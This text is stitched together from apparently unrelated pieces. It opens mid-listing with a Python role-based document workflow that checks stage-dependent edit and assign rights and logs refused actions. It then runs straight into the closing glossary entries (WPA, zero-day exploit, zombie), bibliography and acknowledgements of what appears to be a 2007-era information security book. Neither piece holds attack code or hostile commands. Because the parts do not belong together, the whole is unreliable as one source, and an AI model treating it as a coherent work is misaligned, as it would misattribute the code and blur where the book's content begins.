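        return allowed

    def require(self, user: str, action: str) -> None:
        if action not in self.rights(user):
            raise WorkflowError(f"{user} may not {action} '{self.title}' while it is in {self.stage}")

    def assign(self, by: str, user: str, role: str) -> None:
        """Whoever holds 'assign' (the owner, here) delegates non-owner roles."""
        self.require(by, "assign")
        if role == "owner":
            raise WorkflowError("ownership is not delegated through assign()")
        self.roles.setdefault(user, set()).add(role)

    def edit(self, user: str, text: str) -> None:
        self.require(user, "edit")
        self.body = text

    def advance(self, user: str, action: str) -> None:
        self.require(user, action)
        next_stage = TRANSITIONS.get((self.stage, action))
        if next_stage is None:
            raise WorkflowError(f"{action} does not move a document out of {self.stage}")
        self.stage = next_stage


def run_press_release():
    """Walk one document through the stages; return it plus the actions that were refused."""
    doc = Document("Q2 results", owner="alice")
    refused = []

    def attempt(fn, *args):
        try:
            fn(*args)
        except WorkflowError as err:
            refused.append(str(err))

    doc.assign("alice", "bob", "editor")
    doc.assign("alice", "carol", "reviewer")
    doc.assign("alice", "dave", "approver")
    doc.edit("bob", "Revenue grew 12%.")             # editor may edit a draft
    doc.advance("alice", "submit")                    # -> review
    attempt(doc.edit, "bob", "Revenue grew 50%.")     # refused: no 'edit' in review
    attempt(doc.advance, "bob", "pass_review")        # refused: bob is not a reviewer
    doc.advance("carol", "pass_review")               # -> approval
    attempt(doc.assign, "carol", "eve", "approver")   # refused: reviewers cannot assign
    doc.advance("dave", "approve")                    # -> published
    attempt(doc.edit, "alice", "Correction")          # refused: even the owner cannot edit now
    return doc, refused


if __name__ == "__main__":
    document, denied = run_press_release()
    print(document.stage, document.body)
    for line in denied:
        print("refused:", line)
```

The same person keeps the editor role throughout, but the right to edit exists only while the document is in draft, and only whoever holds "assign" (the owner) can hand out roles. Under a plain ACL, bob's edit permission would be a fixed attribute of the file that someone central would have to remember to revoke at publication.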

WPA WPA and WPA2 are encryption standards for newer wireless
networking protocols. They replace the insecure WEP encryption used
in first-generation wireless networks and are still considered safe
(with a long, hard-to-guess passphrase). WPA was an interim design
meant to run on WEP-era hardware; WPA2, which uses AES, is the one to
prefer when buying new equipment. Wireless networks, however, are
fundamentally less secure than wired networks, so it is always a good
idea to structure your network so that wireless networks are not trusted
(see the section called “Disappearing Boundaries”).

WPA2 See WPA.

zero-day exploit An exploit for a vulnerability for which no fix is yet available,
so called because the vendor has had “zero days” to respond; often the
vulnerability and the exploit become known at the same time. Zero-day
exploits in third-party software are extremely dangerous since it will
take time for vendors to produce an update fixing the vulnerability
and, in the meantime, attackers may freely use the exploit. Often, the
only effective solution is to close or reduce services in some manner
to deny access to the vulnerability while security experts attempt to
fix the problem. For example, users can temporarily turn off JavaScript
in their web browsers to avoid an exploit which uses JavaScript.

zombie A computer infected by malware which is under remote control. A
zombie will be made to perform illegal tasks for its controller, such
as sending spam, breaking into other computers, and Distributed Denial-
of-Service (DDoS) attacks. A zombie generally includes a key logger
as well.

Bibliography
[AliPabrai-2005] Certification Magazine. MediaTec Publishing, Inc. “The CobiT Security Baseline”. Uday O. Ali
Pabrai. July 2005. http://www.certmag.com/articles/templates/cmag_department_sec.asp?articleid=1239&zoneid=43#

[Bbc-2007a] BBC News. BBC. “Malicious code rise driven by web”. The number of new pieces of malicious
software has doubled in the last year with the web being used increasingly to distribute the code, a report
says. March 19, 2007. http://news.bbc.co.uk/2/hi/technology/6465833.stm

[Bbc-2007b] BBC News. BBC. “'Surge' in hijacked PC networks”. April 25, 2007.
http://news.bbc.co.uk/2/hi/technology/6591183.stm

[BrownleeGuttman-1998] N. Brownlee and E. Guttman. “Request for Comments: 2350 - Expectations for Computer
Security Incident Response”. Internet Engineering Task Force. June 1998. RFC 2350.
http://www.ietf.org/rfc/rfc2350.txt

[CaSenate-2003] California State Senate. “California Information Practice Act of 2003”. SB 1386. September 26,
2002. This bill became law in 2003. The text of the law is available online at
http://info.sen.ca.gov/pub/01-02/bill/sen/sb_1351-1400/sb_1386_bill_20020926_chaptered.html

[Dhhs-2003] The Federal Register. National Archives and Records Administration. 45 CFR Parts 160, 162, and 164:
Health Insurance Reform: Security Standards; Final Rule. February 20, 2003. Vol. 68, No. 34.
http://www.cms.hhs.gov/SecurityStandard/Downloads/securityfinalrule.pdf

[Evett-2007] Top Ten Reviews. TopTenReviews, Inc. Don Evett. “Spam Statistics 2006”. January 18, 2007.
http://spam-filter-review.toptenreviews.com/spam-statistics.html

[FbiIc3-2006] Internet Crime Complaint Center 2006 Internet Fraud Crime Report, January 1, 2006 - December 31,
2006. National White Collar Crime Center and Federal Bureau of Investigation, FBI Internet Crime Complaint
Center. Washington D.C. 2007. http://www.ic3.gov/media/annualreport/2006_IC3Report.pdf

[FeynmanEtAl-1985] Richard Phillips Feynman, Ralph Leighton, and Edward Hutchings. Surely You're Joking,
Mr. Feynman!: Adventures of a Curious Character, Richard P. Feynman as told to Ralph Leighton; edited by
Edward Hutchings. W.W. Norton, New York. 1985. ISBN 0393019217.

[GarfinkleMalan-2006] Simson L. Garfinkel and David J. Malan. “One Big File Is Not Enough: A Critical Evaluation
of the Dominant Free-Space Sanitization Technique”. 2006. A copy of this paper is available from the authors,
or on the web at http://www.simson.net/clips/academic/2006.PET.bigfile.pdf

[GordonEtAl-2006] 2006 CSI/FBI Computer Crime and Security Survey. Lawrence A. Gordon, Martin P. Loeb,
William Lucyshyn, and Robert Richardson. Computer Security Institute and Federal Bureau of Investigation.
Copyright © 2006 Computer Security Institute. 2006. The report can be obtained online by following links
from http://www.gocsi.com/press/20060712.jhtml and registering.

[Harbert-2006] IQ Magazine. Cisco Systems, Inc. Tom Harbert. Mick Wiggins. “Combining Security and
Regulatory Compliance”. Using best practices for network security sets a course to time savings, asset
protection, and sales to big customers. 3rd Quarter 2006.
http://www.cisco.com/web/about/ac123/iqmagazine/archives/q3_2006/COMP_sailingcompliance.html

[Higgins-2007] Dark Reading. Light Reading, Inc., New York, NY. Kelly Jackson Higgins. “How to Cheat Hardware
Memory Access”. February 27, 2007. http://www.darkreading.com/document.asp?doc_id=118291

[Isf-2005a] Information Security Forum. The Standard of Good Practice for Information Security, version 4.1.
Copyright © 2005 Information Security Forum. January 2005. The standard can be obtained online from
http://www.isfsecuritystandard.com/index_ie.htm. Registration is required. As of the time of this writing,
their site will not function if JavaScript is not enabled.

[Isf-2005b] Information Security Forum. ISF Digest: The Disappearance of the Network Boundary. Copyright
© 2005 Information Security Forum. April 2005. The report can be obtained online from
http://www.securityforum.org/html/view_pub01.asp. Registration is required. As of the time of this writing,
their site will not function if JavaScript is not enabled.

[IsoIec-2005] ISO/IEC 17799:2005. Information Technology - Security Techniques - Code of practice for
information security management. ISO, Geneva, Switzerland. 2005. Copies can be obtained from the ISO
Online Store: http://www.iso.org/iso/en/CatalogueDetailPage.CatalogueDetail?CSNUMBER=39612&ICS1=35&ICS2=40&ICS3=

[Itgi-2004] IT Governance Institute. COBIT® Security Baseline: An Information Security Survival Kit. IT Governance
Institute, Rolling Meadows, Illinois. 2004. ISBN 1-893209-79-2. A PDF is available online with site
registration at http://www.isaca.org/TemplateRedirect.cfm?template=/ContentManagement/ContentDisplay.cfm&ContentID=20290.
The downloaded PDF has several pages of ads and membership material at the front; it is the correct document.

[Itgi-2005] IT Governance Institute. COBIT® 4.0: Control Objectives, Management Guidelines, Maturity Models. IT
Governance Institute, Rolling Meadows, Illinois. 2005. ISBN 1-933284-37-4. A PDF is available online with
site registration at http://www.isaca.org/cobit.htm

[Itgi-2006] COBIT® Focus (http://www.isaca.org/Template.cfm?Section=Home&CONTENTID=31703&TEMPLATE=/ContentManagement/ContentDisplay.cfm).
IT Governance Institute, Rolling Meadows, Illinois. “Harley-Davidson: Using COBIT to Simplify Compliance”.
pp. 8-9. Issue 2, December 2006. Copyright © 2006 IT Governance Institute. This issue is available in PDF
form online at http://www.isaca.org/Template.cfm?Section=Home&Template=/ContentManagement/ContentDisplay.cfm&ContentID=28423.
Note that the table of contents is wrong; the article begins on page 8.

[Kantor-2005] USA Today. Andrew Kantor. “Sony: The rootkit of all evil?”. November 17, 2005, 5:00 PM.
Copyright © 2005 USA Today. http://www.usatoday.com/tech/columnist/andrewkantor/2005-11-17-sony-rootkit_x.htm

[Keizer-2007] ComputerWorld. ComputerWorld, Inc. Gregg Keizer. “Massive spam shot of 'Storm Trojan' reaches
record proportions”. It's the biggest spam blast in the last year. April 12, 2007. Copyright © 2007
ComputerWorld, Inc. http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9016420

[Krazit-2006] ZDNet News. CNet Networks, Inc. Tom Krazit. “FAQ: The HP 'pretexting' scandal”. September 6,
2006, 4:42 PM PT. Copyright © 2006 CNet Networks, Inc. http://news.zdnet.com/2100-9595_22-6113011.html

[Krebs-2007] Security Fix. The Washington Post Company. Brian Krebs. “Fortune 500s Unwittingly Become
Spammers”. March 29, 2007, 11:11 AM ET. Copyright © 2007 The Washington Post Company.
http://blog.washingtonpost.com/securityfix/2007/03/fortune_500s_unwittingly_becom.html

[Lazarus-2006] The San Francisco Chronicle. Hearst Communications, Inc. David Lazarus. “Data theft may hurt
workers”. August 16, 2006. Copyright © 2006 Hearst Communications, Inc. This article appeared on page
C-1 of the San Francisco Chronicle. http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2006/08/16/BUG1EKJ14T1.DTL

[Lemos-2007a] SecurityFocus™. Robert Lemos. “Consumers dump breached retailers, says study”. April 11, 2007.
Copyright © 2007 SecurityFocus. http://www.securityfocus.com/brief/481

[Lemos-2007b] SecurityFocus™. Robert Lemos. “Report: TJX thieves exploited wireless insecurities”. May 4, 2007.
Copyright © 2007 SecurityFocus. http://www.securityfocus.com/brief/496

[LioyEtAl-1997] Antonio Lioy, Fabio Maino, and Marco Mezzalama. “Secure Document Management and
Distribution in an Open Network Environment”. Politecnico di Torino, Dip. di Automatica e Informatica.
Torino, Italy. 1997.

[MatsumotoEtAl-2002] Proceedings of SPIE Vol. 4677, Optical Security and Counterfeit Deterrence Techniques
IV. T. Matsumoto, H. Matsumoto, K. Yamada, and S. Hoshino. “Impact of Artificial Gummy Fingers on
Fingerprint Systems”. 2002. Copies of this paper can be obtained from the author by email
(tsutomu@mlab.jks.ynu.ac.jp) or online from Cryptome.org at http://cryptome.org/gummy.htm. There is also a
summary of the findings in the May 15th, 2002 Crypto-Gram Newsletter from Counterpane Internet Security, Inc.:
http://www.schneier.com/crypto-gram-0205.html#5

[Maxcer-2007] TechNewsWorld™. ECT News Network™. Chris Maxcer. “Fail-Safe System Fails in Alaska's Data
Debacle”. March 21, 2007, 2:30 AM PT. Copyright © 2007 ECT News Network, Inc.
http://www.technewsworld.com/story/56414.html

[MythBusters-2006] MythBusters. Beyond International. “Crimes and Myth-Demeanors 2”. August 23, 2006. Season 4,
episode 59. An online summary of this episode is available on Wikipedia:
http://en.wikipedia.org/w/index.php?title=MythBusters_%28season_4%29&oldid=127130877

[Osi-2006] Open Source Initiative. Open Source Definition. July 7, 2006, 3:49. Copyright © 2006 Open Source
Initiative. http://opensource.org/docs/osd. There is also an annotated version with some additional rationale at
http://opensource.org/docs/definition.php

[PciSsc-2006] Payment Card Industry Data Security Standard, version 1.1. PCI Security Standards Council, LLC.
Wakefield, MA. September 2006. https://www.pcisecuritystandards.org/pdfs/pci_dss_v1-1.pdf

[PciSsc-2007] PCI Security Standards Council™. The PCI Security Standards Council Frequently Asked Questions -
General Information. PCI Security Standards Council, LLC. Wakefield, Massachusetts. April 17, 2007.
Copyright © 2007 PCI Security Standards Council, LLC. https://www.pcisecuritystandards.org/about/faqs.htm

[Rasch-2007] SecurityFocus™. Mark Rasch. “The Politics of E-Mail”. April 17, 2007. Copyright © 2007
SecurityFocus. http://www.securityfocus.com/columnists/440/1

[Schneier-2005] Wired. CondéNet, Inc. Bruce Schneier. “Real Story of the Rogue Rootkit”. November 17, 2005,
2:00 AM. Copyright © 2005 CondéNet, Inc.
http://www.wired.com/politics/security/commentary/securitymatters/2005/11/69601

[Schneier-2007] Wired. CondéNet, Inc. Bruce Schneier. “How Security Companies Sucker Us With Lemons”. April
19, 2007, 2:00 AM. Copyright © 2007 CondéNet, Inc.
http://www.wired.com/politics/security/commentary/securitymatters/2007/04/securitymatters_0419

[SeiCm-2001] CERT® Coordination Center. Carnegie Mellon Software Engineering Institute, Pittsburgh, PA
15213-3890. CERT® Coordination Center Incident Reporting Guidelines. July 30, 2001. Copyright © 2001
Carnegie Mellon University. http://www.cert.org/tech_tips/incident_reporting.html

[SeiCm-2007] Software Engineering Institute, Carnegie Mellon, Pittsburgh, PA 15213-3890. Open Systems Glossary
(http://www.sei.cmu.edu/opensystems/glossary.html#o), part of the SEI Open Systems site at
http://www.sei.cmu.edu/opensystems/welcome.html. March 20, 2007, 8:38:06. Copyright © 2007 Carnegie Mellon
University.

[SoleckiRosenberg-2004] Law Journal Newsletters - Employment Law Strategist. ALM Properties, Inc. Albert J.
Solecki, Jr. and Melissa G. Rosenberg. “Workplace E-mail: Employers Beware!”. Vol. 12, No. 7. November 2004.
Copyright © 2004 ALM Properties, Inc.
http://www.goodwinprocter.com/getfile.aspx?filepath=/Files/publications/solecki_rosenberg_11_04.pdf

[Sullivan-2006] The Red Tape Chronicles. MSNBC. Bob Sullivan. “'I just bought your hard drive'”. June 5, 2006,
3:00 am CT. Copyright © 2006 MSNBC.com. http://redtape.msnbc.com/2006/06/one_year_ago_ha.html

[TewsEtAl-2007] Erik Tews, Ralph-Philipp Weinmann, and Andrei Pyshkin. “Breaking 104 bit WEP in less than
60 seconds”. Technische Universität Darmstadt, Fachbereich Informatik, Hochschulstrasse 10, D-64289
Darmstadt. April 3, 2007. http://eprint.iacr.org/2007/120

[Tweakers-2007] Tweakers.net. “Secustick gives false sense of security”. April 12, 2007, 08:59. Copyright
© 2007 Tweakers.net. This article is translated from the Dutch. http://tweakers.net/reviews/683

[Usc-1996] Health Insurance Portability and Accountability Act of 1996. Public Law 104-191. 1996. The text of
the law is available online at http://aspe.hhs.gov/admnsimp/pl104191.htm

[Vijayan-2007a] ComputerWorld. ComputerWorld, Inc. Jaikumar Vijayan. “TJX data breach: At 45.6M card
numbers, it's the biggest ever”. It eclipses the compromise in June 2005 at CardSystems Solutions. March
29, 2007. Copyright © 2007 ComputerWorld, Inc.
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9014782

[Vijayan-2007b] ComputerWorld (Australia). IDG Communications, Inc. Jaikumar Vijayan. “Hackers offer
subscription, support for their malware”. Organised hacking gangs set up malware subscription sites. April
5, 2007, 08:17:16. Copyright © 2007 IDG Communications, Inc.
http://www.computerworld.com.au/index.php/id;838771320;fp;16;fpid;0

[Weber-2007] BBC News. BBC. Tim Weber. “Criminals 'may overwhelm the web'”. January 25, 2007.
http://news.bbc.co.uk/2/hi/business/6298641.stm

[West-BrownEtAl-2003] Moira J. West-Brown, Don Stikvoort, Klaus-Peter Kossakowski, Georgia Killcrece, Robin
Ruefle, and Mark Zajicek. Handbook for Computer Security Incident Response Teams (CSIRTs), 2nd edition.
Carnegie Mellon Software Engineering Institute, Pittsburgh, PA 15213-3890. April 2003. Copyright © 2003
Carnegie Mellon University. http://www.cert.org/archive/pdf/csirt-handbook.pdf

Thanks to Bruno Vernay for the CSS template I started from for the HTML version. Many thanks to the
folks at OASIS and everyone else who makes DocBook a wonderful tool.